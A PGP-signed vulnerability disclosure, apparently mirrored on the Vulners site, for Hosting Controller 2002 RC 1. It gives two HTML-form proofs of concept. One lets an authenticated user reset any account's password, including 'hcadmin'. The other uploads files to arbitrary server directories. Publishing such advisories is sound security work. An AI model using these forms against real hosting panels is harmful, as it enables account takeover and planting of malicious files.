`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hello,
i've found 2 vulnerabilities in Hosting Controller that allows remote
authenticated users to change every user password or upload files in every
directory. Here are the PoC:
This allows to modify passwords:
<form
action="http://[URL]/admin/accounts/AccountActions.asp?ActionType=UpdateUser
"
method="post">
Username: <input name="UserName" value="hcadmin"
type="text" size="50">
<br>
Name: <input name="FullName" value="g|25|h"
type="text" size="50">
<br>
ChangePass (type true): <input type="checkbox" name="PassCheck"
value="TRUE">
<br>
Password: <input name="Pass1" title="Password">
<br>
Confirm: <input name="ConfPass" title="Password">
<br>
<input name="submit" value="submit" type="submit">
</form>
<br>
PS: You should have authenticated access.<br>
<br>
- -------------------------<br>
Vulnerable versions:<br>
- - HC 2002 RC 1<br>
Other versions may be vulnerable
And this allows to upload:
<form method="POST" action="http://[URL]/admin/folders/saveuploadfiles.asp"
enctype="multipart/form-data">
Where upload files: <input name="OpenPath" value="E:\webspace\test">
<br>
File 1: <input type="file" name="file1" value><br>
File 2: <input type="file" name="file2" value><br>
File 3: <input type="file" name="file3" value><br>
File 4: <input type="file" name="file4" value><br>
<input type="submit" value="Upload Files" name="upload"><br>
<br><br>
PS: If you see an error message, it's not important. You just should have
authenticated access.
</form>
<br>
- -------------------------<br>
Vulnerable versions:<br>
- - HC 2002 RC 1<br>
Other versions may be vulnerable
This vulns are tested with HC 2002 RC 1, but other versions may be
vulnerable.
Sorry for my english, but i'm Italian.
-----BEGIN PGP SIGNATURE-----
Version: 6.5.8ckt http://www.ipgpp.com/
iQA/AwUBRC/pBBMZt0KZeGPOEQK5lwCg13JhLH6ghgWoO8zUSG5EUZpmwtwAmwdh
KUkiwb7H3FkEdfZcORRpl4LH
=qlwF
-----END PGP SIGNATURE-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation